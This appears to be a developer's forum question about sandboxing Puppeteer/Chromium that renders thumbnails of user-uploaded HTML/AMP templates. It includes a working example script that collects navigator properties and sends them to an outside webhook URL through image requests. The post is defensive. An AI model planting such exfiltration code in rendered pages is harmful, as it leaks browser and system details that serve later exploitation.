I have a website where people can upload HTML/AMP templates and we generate a thumbnail of the uploaded template. The issue is that since people can upload any HTML/AMP template, it can contain scripts under the <script> tag. But we cannot disable the <script> tag because the scripts are required to generate the proper thumbnails of the uploaded template. A user can exploit this by executing scripts like or any script he can pull from src attributes.

We have limited the script execution time with the Page.setDefaultNavigationTimeout() method.
<h1 id='heading'>Testing the html page</h1>
<script>
  var heading = document.getElementById('heading');
  heading.innerHTML = 'New Heading!';
  let i = 0;
  for (const key in navigator) {
    if (i++ > 10) {
      break;
    }
    heading.innerHTML += "<img src='https://webhook.site/847e1107-43a4-455f-a3ce-b0591ae8294d?" + key + "=" + encodeURIComponent(JSON.stringify(navigator[key])) + "'>";
    //console.log(key + "=" + encodeURIComponent(JSON.stringify(navigator[key])))
  }
</script>
I am worried that a hacker can post the navigator information about the browser and OS, like the one shown in the code above, and use this info to exploit a vulnerability in the browser, take control of the container, and get the environment variables which contain secrets for queues, databases and other stuff.

Is there a way or pattern to isolate the Puppeteer or Chromium process (for example using sidecar containers) so that even if someone exploits a browser vulnerability and gets access to the container, he is not able to get access to the Node.js process? How do industry players like HTML-to-PDF converters and others prevent such issues?

Also, what flags need to be enabled to make it more secure?